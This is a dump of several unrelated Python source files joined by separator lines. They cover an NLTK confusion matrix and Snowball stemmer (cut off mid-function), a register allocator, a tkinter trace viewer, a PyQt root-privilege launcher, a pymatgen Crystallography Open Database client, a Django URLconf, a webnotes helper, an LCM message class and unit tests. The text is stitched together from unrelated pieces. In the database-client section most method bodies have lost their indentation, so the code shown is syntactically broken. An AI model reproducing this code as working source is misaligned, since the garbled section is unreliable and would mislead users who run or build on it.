    >>> ref = 'DET NN VB DET JJ NN NN IN DET NN'.split()
    >>> test = 'DET VB VB DET NN NN NN IN DET NN'.split()
    >>> cm = ConfusionMatrix(ref, test)
    >>> print(cm['NN', 'NN'])
    3
    Note that the diagonal entries *Ri=Tj* of this matrix
    corresponds to correct values; and the off-diagonal entries
    correspond to incorrect values.
    """
    def __init__(self, reference, test, sort_by_count=False):
        """
        Construct a new confusion matrix from a list of reference
        values and a corresponding list of test values.
        :type reference: list
        :param reference: An ordered list of reference values.
        :type test: list
        :param test: A list of values to compare against the
            corresponding reference values.
        :param sort_by_count: If true, order the value axes by how often
            each value occurs (most frequent first).
        :raise ValueError: If ``reference`` and ``test`` do not have
            the same length.
        """
        if len(reference) != len(test):
            raise ValueError('Lists must have the same length.')
        # Get a list of all values.
        if sort_by_count:
            ref_fdist = FreqDist(reference)
            test_fdist = FreqDist(test)
            def key(v): return -(ref_fdist[v]+test_fdist[v])
            values = sorted(set(reference+test), key=key)
        else:
            values = sorted(set(reference+test))
        # Construct a value->index dictionary
        indices = dict((val,i) for (i,val) in enumerate(values))
        # Make a confusion matrix table.
        confusion = [[0 for val in values] for val in values]
        max_conf = 0 # Maximum confusion
        for w,g in zip(reference, test):
            confusion[indices[w]][indices[g]] += 1
            max_conf = max(max_conf, confusion[indices[w]][indices[g]])
        #: A list of all values in ``reference`` or ``test``.
        self._values = values
        #: A dictionary mapping values in ``self._values`` to their indices.
        self._indices = indices
        #: The confusion matrix itself (as a list of lists of counts).
        self._confusion = confusion
        #: The greatest count in ``self._confusion`` (used for printing).
        self._max_conf = max_conf
        #: The total number of values in the confusion matrix.
        self._total = len(reference)
        #: The number of correct (on-diagonal) values in the matrix.
        self._correct = sum(confusion[i][i] for i in range(len(values)))
    def __getitem__(self, li_lj_tuple):
        """
        :return: The number of times that value ``li`` was expected and
        value ``lj`` was given.
        :rtype: int
        """
        (li, lj) = li_lj_tuple
        i = self._indices[li]
        j = self._indices[lj]
        return self._confusion[i][j]
    def __repr__(self):
        return '<ConfusionMatrix: %s/%s correct>' % (self._correct,
                                                     self._total)
    def __str__(self):
        return self.pretty_format()
    def pretty_format(self, show_percents=False, values_in_chart=True,
                      truncate=None, sort_by_count=False):
        """
        :return: A multi-line string representation of this confusion matrix.
        :type truncate: int
        :param truncate: If specified, then only show the specified
            number of values. Any sorting (e.g., sort_by_count)
            will be performed before truncation.
        :param sort_by_count: If true, then sort by the count of each
            label in the reference data. I.e., labels that occur more
            frequently in the reference label will be towards the left
            edge of the matrix, and labels that occur less frequently
            will be towards the right edge.
        @todo: add marginals?
        """
        confusion = self._confusion
        values = self._values
        if sort_by_count:
            values = sorted(values, key=lambda v:
                            -sum(self._confusion[self._indices[v]]))
        if truncate:
            values = values[:truncate]
        if values_in_chart:
            value_strings = ["%s" % val for val in values]
        else:
            value_strings = [str(n+1) for n in range(len(values))]
        # Construct a format string for row values
        valuelen = max(len(val) for val in value_strings)
        value_format = '%' + repr(valuelen) + 's | '
        # Construct a format string for matrix entries
        if show_percents:
            entrylen = 6
            entry_format = '%5.1f%%'
            zerostr = '     .'
        else:
            entrylen = len(repr(self._max_conf))
            entry_format = '%' + repr(entrylen) + 'd'
            zerostr = ' '*(entrylen-1) + '.'
        # Write the column values.
        s = ''
        for i in range(valuelen):
            s += (' '*valuelen)+' |'
            for val in value_strings:
                if i >= valuelen-len(val):
                    s += val[i-valuelen+len(val)].rjust(entrylen+1)
                else:
                    s += ' '*(entrylen+1)
            s += ' |\n'
        # Write a dividing line
        s += '%s-+-%s+\n' % ('-'*valuelen, '-'*((entrylen+1)*len(values)))
        # Write the entries.
        for val, li in zip(value_strings, values):
            i = self._indices[li]
            s += value_format % val
            for lj in values:
                j = self._indices[lj]
                if confusion[i][j] == 0:
                    s += zerostr
                elif show_percents:
                    s += entry_format % (100.0*confusion[i][j]/self._total)
                else:
                    s += entry_format % confusion[i][j]
                # Mark the on-diagonal (correct) entry with angle brackets.
                if i == j:
                    prevspace = s.rfind(' ')
                    s = s[:prevspace] + '<' + s[prevspace+1:] + '>'
                else: s += ' '
            s += '|\n'
        # Write a dividing line
        s += '%s-+-%s+\n' % ('-'*valuelen, '-'*((entrylen+1)*len(values)))
        # Write a key
        s += '(row = reference; col = test)\n'
        if not values_in_chart:
            s += 'Value key:\n'
            for i, value in enumerate(values):
                s += '%6d: %s\n' % (i+1, value)
        return s
    def key(self):
        """Return a string mapping matrix indices to their values."""
        values = self._values
        # Renamed from 'str' — the original shadowed the builtin.
        text = 'Value key:\n'
        indexlen = len(repr(len(values)-1))
        key_format = '  %'+repr(indexlen)+'d: %s\n'
        for i in range(len(values)):
            text += key_format % (i, values[i])
        return text
def demo():
    """Print a sample confusion matrix for a small POS-tagging example,
    both in default order and sorted by label frequency."""
    gold = 'DET NN VB DET JJ NN NN IN DET NN'.split()
    predicted = 'DET VB VB DET NN NN NN IN DET NN'.split()
    print('Reference =', gold)
    print('Test    =', predicted)
    print('Confusion matrix:')
    matrix = ConfusionMatrix(gold, predicted)
    print(matrix)
    print(matrix.pretty_format(sort_by_count=True))
# Run the demonstration when executed as a script.
if __name__ == '__main__':
    demo()
|
__author__ = "Jon Dawson"
__copyright__ = "Copyright (C) 2012, Jonathan P Dawson"
__version__ = "0.1"
class Allocator:
    """Maintain a pool of registers, variables and arrays. Keep track of what they are used for."""
    def __init__(self, reuse):
        # Registers currently checked out.
        self.registers = []
        # Every register ever handed out: reg -> (name, size).
        self.all_registers = {}
        # Next free offsets in the 2-byte and 4-byte memories.
        self.memory_size_2 = 0
        self.memory_size_4 = 0
        # When True, free() returns registers to the pool for reuse.
        self.reuse = reuse
        # Initial memory contents, keyed by location.
        self.memory_content_2 = {}
        self.memory_content_4 = {}
    def new_array(self, size, contents, element_size):
        """Reserve *size* elements in the memory for *element_size*-byte
        items, optionally pre-loading *contents*. Returns the base offset."""
        if element_size == 2:
            base = self.memory_size_2
            self.memory_size_2 += int(size)
            if contents is not None:
                for offset, item in enumerate(contents, base):
                    self.memory_content_2[offset] = item
            return base
        elif element_size == 4:
            base = self.memory_size_4
            self.memory_size_4 += int(size)
            if contents is not None:
                for offset, item in enumerate(contents, base):
                    self.memory_content_4[offset] = item
            return base
    def regsize(self, reg):
        """Return the size that *reg* was originally allocated with."""
        return self.all_registers[reg][1]
    def new(self, size, name="temporary_register"):
        """Allocate the lowest-numbered register that is currently free and
        whose previous allocation (if any) used the same *size*."""
        assert type(size) is int
        candidate = 0
        while (candidate in self.registers or
               (candidate in self.all_registers and self.regsize(candidate) != size)):
            candidate += 1
        self.registers.append(candidate)
        self.all_registers[candidate] = (name, size)
        return candidate
    def free(self, register):
        """Return *register* to the pool (no-op unless reuse is enabled)."""
        if self.reuse and register in self.registers:
            self.registers.remove(register)
|
from tkinter.scrolledtext import ScrolledText
import tkinter as tk
from trace_json import traceparse
from parsley_json import jsonGrammar
# Read the sample document once at import time; the context manager closes
# the handle instead of leaking it until GC (the original used bare open()).
with open('337141-steamcube.json') as _json_file:
    jsonData = _json_file.read()
class Tracer(object):
    """Steps through a recorded parse trace, highlighting the current
    entry's grammar span and input position in two text widgets.
    Each trace entry has the shape ``(_, (grammarStart, grammarEnd), inputPos)``.
    """
    def __init__(self, grammarWin, inputWin, logWin, trace):
        self.grammarWin = grammarWin
        self.inputWin = inputWin
        self.logWin = logWin
        self.trace = trace
        # Index into self.trace of the entry currently displayed.
        self.position = 0
    def advance(self):
        """Show the next trace entry, if there is one."""
        # Bug fix: the original bound was len(self.trace), which let
        # position reach an out-of-range index and made display() raise
        # IndexError on the final "Next" click.
        if self.position < len(self.trace) - 1:
            self.position += 1
            self.display()
    def rewind(self):
        """Show the previous trace entry, if there is one."""
        if self.position > 0:
            self.position -= 1
            self.display()
    def display(self):
        """Highlight the current entry in the grammar and input widgets."""
        def updateHighlight(w, start, end=None):
            # Replace any existing highlight with one covering
            # [start, end) — character offsets from the widget start.
            w.tag_remove("highlight", "1.0", tk.END)
            start = "1.0+%sc" % (start,)
            if end is not None:
                end = "1.0+%sc" % (end,)
            w.tag_add("highlight", start, end)
            w.tag_configure("highlight", background="yellow")
        _, (grammarStart, grammarEnd), inputPos = self.trace[self.position]
        updateHighlight(self.grammarWin, grammarStart, grammarEnd)
        updateHighlight(self.inputWin, inputPos)
def display(grammar, src, trace):
    """Build the trace-viewer window: grammar text on the left, input on
    the right, a small log pane at the bottom, and Next/Prev buttons wired
    to a Tracer. Returns the Tk root (caller is expected to run mainloop)."""
    r = tk.Tk()
    f = tk.Frame(master=r)
    lt = ScrolledText(master=f)
    rt = ScrolledText(master=f)
    lt.pack(side="left", expand=True, fill="both")
    rt.pack(side="right", expand=True, fill="both")
    bot = ScrolledText(master=r, height=5)
    tracer = Tracer(lt, rt, bot, trace)
    toolbar = tk.Frame(master=r)
    tk.Button(toolbar, text="Next", width=5, command=tracer.advance).pack(
        side="left")
    tk.Button(toolbar, text="Prev", width=5, command=tracer.rewind).pack(
        side="left")
    f.pack(expand=1, fill="both")
    toolbar.pack(fill=tk.X)
    bot.pack(fill=tk.X)
    lt.insert(tk.END, grammar)
    rt.insert(tk.END, src)
    # Render the first trace entry immediately.
    tracer.display()
    return r
# Script entry: trace-parse the sample JSON and launch the viewer.
_, trace = traceparse(jsonData)
root = display(jsonGrammar, jsonData, trace)
root.mainloop()
|
from sys import argv,exit
from os import getuid
from PyQt4.QtGui import QApplication,QIcon
from Core.Privilege import frm_privelege
from Core.Main import Initialize
from Core.check import check_dependencies
from Modules.utils import Refactor
def ExecRootApp():
    """Launch the main application window; exits the process with the
    Qt event loop's return code. Assumes the caller is already root."""
    check_dependencies()
    root = QApplication(argv)
    app = Initialize()
    app.setWindowIcon(QIcon('rsc/icon.ico'))
    app.center(),app.show()
    exit(root.exec_())
if __name__ == '__main__':
    # Not running as root: show the privilege dialog first, then relaunch
    # through Refactor.threadRoot with the password the user entered.
    if not getuid() == 0:
        app2 = QApplication(argv)
        priv = frm_privelege()
        priv.setWindowIcon(QIcon('rsc/icon.ico'))
        priv.show(),app2.exec_()
        exit(Refactor.threadRoot(priv.Editpassword.text()))
    ExecRootApp()
|
"""
This module provides classes to interface with the Crystallography Open
Database. If you use data from the COD, please cite the following works (as
stipulated by the COD developers)::
Merkys, A., Vaitkus, A., Butkus, J., Okulič-Kazarinas, M., Kairys, V. &
Gražulis, S. (2016) "COD::CIF::Parser: an error-correcting CIF parser for
the Perl language". Journal of Applied Crystallography 49.
Gražulis, S., Merkys, A., Vaitkus, A. & Okulič-Kazarinas, M. (2015)
"Computing stoichiometric molecular composition from crystal structures".
Journal of Applied Crystallography 48, 85-91.
Gražulis, S., Daškevič, A., Merkys, A., Chateigner, D., Lutterotti, L.,
Quirós, M., Serebryanaya, N. R., Moeck, P., Downs, R. T. & LeBail, A.
(2012) "Crystallography Open Database (COD): an open-access collection of
crystal structures and platform for world-wide collaboration". Nucleic
Acids Research 40, D420-D427.
Grazulis, S., Chateigner, D., Downs, R. T., Yokochi, A. T., Quiros, M.,
Lutterotti, L., Manakova, E., Butkus, J., Moeck, P. & Le Bail, A. (2009)
"Crystallography Open Database – an open-access collection of crystal
structures". J. Appl. Cryst. 42, 726-729.
Downs, R. T. & Hall-Wallace, M. (2003) "The American Mineralogist Crystal
Structure Database". American Mineralogist 88, 247-250.
"""
import requests
import subprocess
from monty.dev import requires
from monty.os.path import which
import re
from pymatgen.core.composition import Composition
from pymatgen.core.structure import Structure
from pymatgen.util.string import formula_double_format
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "1.0"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
class COD(object):
"""
An interface to the Crystallography Open Database.
"""
    def __init__(self):
        # The COD endpoints are stateless, so no configuration is needed.
        pass
def query(self, sql):
r = subprocess.check_output(["mysql", "-u", "cod_reader", "-h",
"www.crystallography.net", "-e",
sql, "cod"])
return r.decode("utf-8")
@requires(which("mysql"), "mysql must be installed to use this query.")
def get_cod_ids(self, formula):
"""
Queries the COD for all cod ids associated with a formula. Requires
mysql executable to be in the path.
Args:
formula (str): Formula.
Returns:
List of cod ids.
"""
# TODO: Remove dependency on external mysql call. MySQL-python package does not support Py3!
# Standardize formula to the version used by COD.
sql = 'select file from data where formula="- %s -"' % \
Composition(formula).hill_formula
text = self.query(sql).split("\n")
cod_ids = []
for l in text:
m = re.search(r"(\d+)", l)
if m:
cod_ids.append(int(m.group(1)))
return cod_ids
def get_structure_by_id(self, cod_id, **kwargs):
"""
Queries the COD for a structure by id.
Args:
cod_id (int): COD id.
kwargs: All kwargs supported by
:func:`pymatgen.core.structure.Structure.from_str`.
Returns:
A Structure.
"""
r = requests.get("http://www.crystallography.net/cod/%s.cif" % cod_id)
return Structure.from_str(r.text, fmt="cif", **kwargs)
@requires(which("mysql"), "mysql must be installed to use this query.")
def get_structure_by_formula(self, formula, **kwargs):
"""
Queries the COD for structures by formula. Requires mysql executable to
be in the path.
Args:
cod_id (int): COD id.
kwargs: All kwargs supported by
:func:`pymatgen.core.structure.Structure.from_str`.
Returns:
A list of dict of the format
[{"structure": Structure, "cod_id": cod_id, "sg": "P n m a"}]
"""
structures = []
sql = 'select file, sg from data where formula="- %s -"' % \
Composition(formula).hill_formula
text = self.query(sql).split("\n")
text.pop(0)
for l in text:
if l.strip():
cod_id, sg = l.split("\t")
r = requests.get("http://www.crystallography.net/cod/%s.cif"
% cod_id.strip())
try:
s = Structure.from_str(r.text, fmt="cif", **kwargs)
structures.append({"structure": s, "cod_id": int(cod_id),
"sg": sg})
except Exception:
import warnings
warnings.warn("\nStructure.from_str failed while parsing CIF file:\n%s" % r.text)
raise
return structures
|
"""foo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf import settings
from django.contrib import admin
from django.urls import include
from django.urls import path
urlpatterns = [
    # Delegate everything under /polls/ to the polls app's URLconf.
    path("polls/", include("polls.urls")),
    # Standard Django admin site.
    path("admin/", admin.site.urls),
]
# Mount django-debug-toolbar only in development; the import is deferred
# so production deployments need not install the package.
if settings.DEBUG:
    import debug_toolbar
    urlpatterns = [
        path("__debug__/", include(debug_toolbar.urls)),
    ] + urlpatterns
|
from __future__ import unicode_literals
"""
Create a new document with defaults set
"""
import webnotes
from webnotes.utils import nowdate, nowtime, cint, flt
import webnotes.defaults
def get_new_doc(doctype, parent_doc = None, parentfield = None):
	"""
	Create a new, unsaved `webnotes.doc` of `doctype` with defaults applied.

	:param doctype: Name of the DocType to instantiate.
	:param parent_doc: Optional parent document; links the new doc via
		`parent` / `parenttype`.
	:param parentfield: Optional fieldname on the parent under which this
		child doc lives.
	:return: The new document, marked local and owned by the session user.
	"""
	doc = webnotes.doc({
		"doctype": doctype,
		"__islocal": 1,
		"owner": webnotes.session.user,
		"docstatus": 0
	})
	# DocType metadata drives which field defaults apply below.
	meta = webnotes.get_doctype(doctype)
	if parent_doc:
		doc.parent = parent_doc.name
		doc.parenttype = parent_doc.doctype
	if parentfield:
		doc.parentfield = parentfield
	# Apply defaults per field, in priority order: the user's own default
	# first, then the field's declared default.
	for d in meta.get({"doctype":"DocField", "parent": doctype}):
		default = webnotes.defaults.get_user_default(d.fieldname)
		if default:
			doc.fields[d.fieldname] = default
		elif d.fields.get("default"):
			if d.default == "__user":
				# "__user" means the current session user.
				doc.fields[d.fieldname] = webnotes.session.user
			elif d.default == "Today":
				doc.fields[d.fieldname] = nowdate()
			elif d.default.startswith(":"):
				# ":Some DocType" pulls the value from a referenced document:
				# the parent's matching field if available, otherwise the
				# global default for that name.
				ref_fieldname = d.default[1:].lower().replace(" ", "_")
				if parent_doc:
					ref_docname = parent_doc.fields[ref_fieldname]
				else:
					ref_docname = webnotes.conn.get_default(ref_fieldname)
				doc.fields[d.fieldname] = webnotes.conn.get_value(d.default[1:],
					ref_docname, d.fieldname)
			else:
				doc.fields[d.fieldname] = d.default
		# convert type of default
		# Coerce the assigned value to the field's declared type.
		if d.fieldtype in ("Int", "Check"):
			doc.fields[d.fieldname] = cint(doc.fields[d.fieldname])
		elif d.fieldtype in ("Float", "Currency"):
			doc.fields[d.fieldname] = flt(doc.fields[d.fieldname])
		elif d.fieldtype == "Time":
			# NOTE(review): Time fields are always set to "now", even when a
			# default was assigned above — confirm this is intended.
			doc.fields[d.fieldname] = nowtime()
	return doc
|
"""LCM type definitions
This file automatically generated by lcm.
DO NOT MODIFY BY HAND!!!!
"""
try:
import cStringIO.StringIO as BytesIO
except ImportError:
from io import BytesIO
import struct
class vortex_sensor_t(object):
    """LCM message type carrying two vortex sensor readings and a velocity.

    Wire format: an 8-byte type fingerprint followed by three big-endian
    float64 fields in declaration order.
    """

    __slots__ = ["sensor1", "sensor2", "velocity"]

    def __init__(self):
        # All fields default to zero.
        self.sensor1 = 0.0
        self.sensor2 = 0.0
        self.velocity = 0.0

    def encode(self):
        """Serialize this message: fingerprint header + packed payload."""
        out = BytesIO()
        out.write(vortex_sensor_t._get_packed_fingerprint())
        self._encode_one(out)
        return out.getvalue()

    def _encode_one(self, buf):
        # Three big-endian doubles (24 bytes total).
        buf.write(struct.pack(">ddd", self.sensor1, self.sensor2, self.velocity))

    @staticmethod
    def decode(data):
        """Deserialize from bytes or a readable stream, checking the fingerprint."""
        buf = data if hasattr(data, 'read') else BytesIO(data)
        if buf.read(8) != vortex_sensor_t._get_packed_fingerprint():
            raise ValueError("Decode error")
        return vortex_sensor_t._decode_one(buf)

    @staticmethod
    def _decode_one(buf):
        msg = vortex_sensor_t()
        msg.sensor1, msg.sensor2, msg.velocity = struct.unpack(">ddd", buf.read(24))
        return msg

    _hash = None

    @staticmethod
    def _get_hash_recursive(parents):
        # Guard against (impossible here) recursive type definitions.
        if vortex_sensor_t in parents:
            return 0
        tmphash = 0x3525d46ae32101c3 & 0xffffffffffffffff
        # Rotate left by one bit within 64 bits.
        tmphash = (((tmphash << 1) & 0xffffffffffffffff) + (tmphash >> 63)) & 0xffffffffffffffff
        return tmphash

    _packed_fingerprint = None

    @staticmethod
    def _get_packed_fingerprint():
        # Lazily pack and cache the 64-bit fingerprint.
        if vortex_sensor_t._packed_fingerprint is None:
            vortex_sensor_t._packed_fingerprint = struct.pack(">Q", vortex_sensor_t._get_hash_recursive([]))
        return vortex_sensor_t._packed_fingerprint
|
import warnings
import unittest
import os
from pymatgen.alchemy.transmuters import CifTransmuter, PoscarTransmuter
from pymatgen.alchemy.filters import ContainsSpecieFilter
from pymatgen.transformations.standard_transformations import \
SubstitutionTransformation, RemoveSpeciesTransformation, \
OrderDisorderedStructureTransformation
from pymatgen.transformations.advanced_transformations import \
SuperTransformation
'''
Created on Mar 5, 2012
'''
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "Mar 5, 2012"
test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..",
'test_files')
class CifTransmuterTest(unittest.TestCase):
    """Tests CifTransmuter construction from a multi-structure CIF file."""

    def setUp(self):
        warnings.simplefilter("ignore")

    def tearDown(self):
        warnings.simplefilter("default")

    def test_init(self):
        # Apply a single Fe -> Mn substitution to both structures in the file.
        transformations = [SubstitutionTransformation({"Fe": "Mn", "Fe2+": "Mn2+"})]
        transmuter = CifTransmuter.from_filenames(
            [os.path.join(test_dir, "MultiStructure.cif")], transformations)
        self.assertEqual(len(transmuter), 2)
        expected = {"Mn", "O", "Li", "P"}
        for ts in transmuter:
            symbols = {el.symbol
                       for el in ts.final_structure.composition.elements}
            self.assertEqual(expected, symbols)
class PoscarTransmuterTest(unittest.TestCase):
    """Tests PoscarTransmuter construction, chained transformations,
    filtering, and metadata round-trips."""

    def test_init(self):
        subst = SubstitutionTransformation({"Fe": "Mn"})
        transmuter = PoscarTransmuter.from_filenames(
            [os.path.join(test_dir, "POSCAR"),
             os.path.join(test_dir, "POSCAR")],
            [subst])
        self.assertEqual(len(transmuter), 2)
        expected = {"Mn", "O", "P"}
        for ts in transmuter:
            symbols = {el.symbol
                       for el in ts.final_structure.composition.elements}
            self.assertEqual(expected, symbols)

    def test_transmuter(self):
        tsc = PoscarTransmuter.from_filenames(
            [os.path.join(test_dir, "POSCAR")])
        tsc.append_transformation(RemoveSpeciesTransformation('O'))
        self.assertEqual(len(tsc[0].final_structure), 8)
        # Partial occupancy substitution, then ordering which branches the
        # collection into multiple candidate structures.
        tsc.append_transformation(SubstitutionTransformation(
            {"Fe": {"Fe2+": 0.25, "Mn3+": .75}, "P": "P5+"}))
        tsc.append_transformation(OrderDisorderedStructureTransformation(),
                                  extend_collection=50)
        self.assertEqual(len(tsc), 4)
        branched = SuperTransformation(
            [SubstitutionTransformation({"Fe2+": "Mg2+"}),
             SubstitutionTransformation({"Fe2+": "Zn2+"}),
             SubstitutionTransformation({"Fe2+": "Be2+"})])
        tsc.append_transformation(branched, extend_collection=True)
        self.assertEqual(len(tsc), 12)
        # Each history should hold 4 transformations plus the starting structure.
        for ts in tsc:
            self.assertEqual(len(ts), 5, 'something might be wrong with the number of transformations in the history')
        # Filtering: non-strict OR filter first, then a plain one.
        tsc.apply_filter(ContainsSpecieFilter(['Zn2+', 'Be2+', 'Mn4+'],
                                              strict_compare=True, AND=False))
        self.assertEqual(len(tsc), 8)
        self.assertEqual(tsc.transformed_structures[0].as_dict()[
            'history'][-1]['@class'], 'ContainsSpecieFilter')
        tsc.apply_filter(ContainsSpecieFilter(['Be2+']))
        self.assertEqual(len(tsc), 4)
        # set_parameter and add_tags must round-trip through as_dict().
        tsc.set_parameter("para1", "hello")
        self.assertEqual(tsc.transformed_structures[0]
                         .as_dict()['other_parameters']['para1'], 'hello')
        tsc.add_tags(["world", "universe"])
        self.assertEqual(tsc.transformed_structures[0]
                         .as_dict()['other_parameters']['tags'],
                         ["world", "universe"])
# Allow running this test module directly with `python <file>`.
if __name__ == "__main__":
    #import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
|
import unittest
import numpy as np
from chainermn.datasets import create_empty_dataset
import chainerx as chx
class TestEmptyDataset(unittest.TestCase):
    """Checks that create_empty_dataset keeps length but yields empty tuples."""

    def setUp(self):
        pass

    def check_create_empty_dataset(self, original_dataset):
        # The emptied dataset must mirror the source dataset's length while
        # every example collapses to an empty tuple.
        empty_dataset = create_empty_dataset(original_dataset)
        self.assertEqual(len(original_dataset), len(empty_dataset))
        for idx in range(len(original_dataset)):
            self.assertEqual((), empty_dataset[idx])

    def test_empty_dataset_numpy(self):
        self.check_empty_dataset(np)

    def test_empty_dataset_chx(self):
        self.check_empty_dataset(chx)

    def check_empty_dataset(self, xp):
        # Exercise lists and xp arrays of several sizes, including empty
        # and single-element datasets.
        n = 10
        candidates = [
            [],
            [0],
            list(range(n)),
            list(range(n * 5 - 1)),
            xp.array([]),
            xp.array([0]),
            xp.arange(n),
            xp.arange(n * 5 - 1),
        ]
        for dataset in candidates:
            self.check_create_empty_dataset(dataset)
|
"""
Snowball stemmers
This module provides a port of the Snowball stemmers
developed by Martin Porter.
There is also a demo function: `snowball.demo()`.
"""
from __future__ import unicode_literals, print_function
from nltk import compat
from nltk.corpus import stopwords
from nltk.stem import porter
from nltk.stem.util import suffix_replace
from nltk.stem.api import StemmerI
class SnowballStemmer(StemmerI):
    """
    Snowball Stemmer
    The following languages are supported:
    Danish, Dutch, English, Finnish, French, German,
    Hungarian, Italian, Norwegian, Portuguese, Romanian, Russian,
    Spanish and Swedish.
    The algorithm for English is documented here:
    Porter, M. \"An algorithm for suffix stripping.\"
    Program 14.3 (1980): 130-137.
    The algorithms have been developed by Martin Porter.
    These stemmers are called Snowball, because Porter created
    a programming language with this name for creating
    new stemming algorithms. There is more information available
    at http://snowball.tartarus.org/
    The stemmer is invoked as shown below:
    >>> from nltk.stem import SnowballStemmer
    >>> print(" ".join(SnowballStemmer.languages)) # See which languages are supported
    danish dutch english finnish french german hungarian
    italian norwegian porter portuguese romanian russian
    spanish swedish
    >>> stemmer = SnowballStemmer("german") # Choose a language
    >>> stemmer.stem("Autobahnen") # Stem a word
    'autobahn'
    Invoking the stemmers that way is useful if you do not know the
    language to be stemmed at runtime. Alternatively, if you already know
    the language, then you can invoke the language specific stemmer directly:
    >>> from nltk.stem.snowball import GermanStemmer
    >>> stemmer = GermanStemmer()
    >>> stemmer.stem("Autobahnen")
    'autobahn'
    :param language: The language whose subclass is instantiated.
    :type language: str or unicode
    :param ignore_stopwords: If set to True, stopwords are
                             not stemmed and returned unchanged.
                             Set to False by default.
    :type ignore_stopwords: bool
    :raise ValueError: If there is no stemmer for the specified
                       language, a ValueError is raised.
    """

    languages = ("danish", "dutch", "english", "finnish", "french", "german",
                 "hungarian", "italian", "norwegian", "porter", "portuguese",
                 "romanian", "russian", "spanish", "swedish")

    def __init__(self, language, ignore_stopwords=False):
        if language not in self.languages:
            raise ValueError("The language '%s' is not supported." % language)
        # Resolve the language-specific subclass by naming convention,
        # e.g. "german" -> GermanStemmer, and delegate everything to it.
        delegate_cls = globals()[language.capitalize() + "Stemmer"]
        delegate = delegate_cls(ignore_stopwords)
        self.stemmer = delegate
        self.stem = delegate.stem
        self.stopwords = delegate.stopwords
@compat.python_2_unicode_compatible
class _LanguageSpecificStemmer(StemmerI):
    """
    Base class that lets a concrete, language-specific stemmer be
    instantiated directly when the target language is known at runtime.

    :param ignore_stopwords: If set to True, stopwords are
                             not stemmed and returned unchanged.
                             Set to False by default.
    :type ignore_stopwords: bool
    """

    def __init__(self, ignore_stopwords=False):
        # Derive the language from the subclass name,
        # e.g. "GermanStemmer" -> "german".
        name = type(self).__name__.lower()
        if name.endswith("stemmer"):
            name = name[:-7]
        self.stopwords = set()
        if ignore_stopwords:
            try:
                self.stopwords.update(stopwords.words(name))
            except IOError:
                raise ValueError("%r has no list of stopwords. Please set"
                                 " 'ignore_stopwords' to 'False'." % self)

    def __repr__(self):
        """
        Print out the string representation of the respective class.
        """
        return "<%s>" % type(self).__name__
class PorterStemmer(_LanguageSpecificStemmer, porter.PorterStemmer):
    """
    A word stemmer based on the original Porter stemming algorithm.
    Porter, M. \"An algorithm for suffix stripping.\"
    Program 14.3 (1980): 130-137.
    A few minor modifications have been made to Porter's basic
    algorithm. See the source code of the module
    nltk.stem.porter for more information.
    """
    def __init__(self, ignore_stopwords=False):
        # Both bases are initialized explicitly (not via super()) because
        # their __init__ signatures differ.
        _LanguageSpecificStemmer.__init__(self, ignore_stopwords)
        porter.PorterStemmer.__init__(self)
class _ScandinavianStemmer(_LanguageSpecificStemmer):
    """
    Shared helper for the Danish, Norwegian, and Swedish stemmers:
    computation of the string region R1.
    """

    def _r1_scandinavian(self, word, vowels):
        """
        Return the region R1 used by the Scandinavian stemmers.

        R1 is the part of the word after the first non-vowel that follows
        a vowel (or the empty region if there is none), adjusted so that
        at least three letters precede it.

        :param word: The word whose region R1 is determined.
        :type word: str or unicode
        :param vowels: The vowels of the respective language that are
                       used to determine the region R1.
        :type vowels: unicode
        :return: the region R1 for the respective word.
        :rtype: unicode
        :note: Helper for DanishStemmer, NorwegianStemmer, and
               SwedishStemmer; not meant to be invoked directly.
        """
        region = ""
        for pos in range(1, len(word)):
            # Look for the first non-vowel immediately after a vowel.
            if word[pos] in vowels or word[pos - 1] not in vowels:
                continue
            prefix_len = len(word[:pos + 1])
            if 0 < prefix_len < 3:
                # Pad: the region before R1 must span at least 3 letters.
                region = word[3:]
            elif prefix_len >= 3:
                region = word[pos + 1:]
            else:
                return word
            break
        return region
class _StandardStemmer(_LanguageSpecificStemmer):
    """
    Encapsulates the standard definitions of the string regions
    R1, R2, and RV shared by several language stemmers.
    """

    @staticmethod
    def _after_first_nonvowel(text, vowels):
        """Return the substring after the first non-vowel that follows a
        vowel, or "" when no such position exists."""
        for idx in range(1, len(text)):
            if text[idx] not in vowels and text[idx - 1] in vowels:
                return text[idx + 1:]
        return ""

    def _r1r2_standard(self, word, vowels):
        """
        Return the standard interpretations of the string regions R1 and R2.

        R1 is the region after the first non-vowel following a vowel, or
        the null region at the end of the word if there is no such
        non-vowel. R2 is computed the same way, but within R1.

        :param word: The word whose regions R1 and R2 are determined.
        :type word: str or unicode
        :param vowels: The vowels of the respective language that are
                       used to determine the regions R1 and R2.
        :type vowels: unicode
        :return: (r1,r2), the regions R1 and R2 for the respective word.
        :rtype: tuple
        :note: Helper for DutchStemmer, FinnishStemmer, FrenchStemmer,
               GermanStemmer, ItalianStemmer, PortugueseStemmer,
               RomanianStemmer, and SpanishStemmer; not meant to be
               invoked directly. See
               http://snowball.tartarus.org/texts/r1r2.html
        """
        r1 = self._after_first_nonvowel(word, vowels)
        r2 = self._after_first_nonvowel(r1, vowels)
        return (r1, r2)

    def _rv_standard(self, word, vowels):
        """
        Return the standard interpretation of the string region RV.

        If the second letter is a consonant, RV is the region after the
        next following vowel. If the first two letters are vowels, RV is
        the region after the next following consonant. Otherwise, RV is
        the region after the third letter.

        :param word: The word whose region RV is determined.
        :type word: str or unicode
        :param vowels: The vowels of the respective language that are
                       used to determine the region RV.
        :type vowels: unicode
        :return: the region RV for the respective word.
        :rtype: unicode
        :note: Helper for ItalianStemmer, PortugueseStemmer,
               RomanianStemmer, and SpanishStemmer; not meant to be
               invoked directly.
        """
        rv = ""
        if len(word) >= 2:
            if word[1] not in vowels:
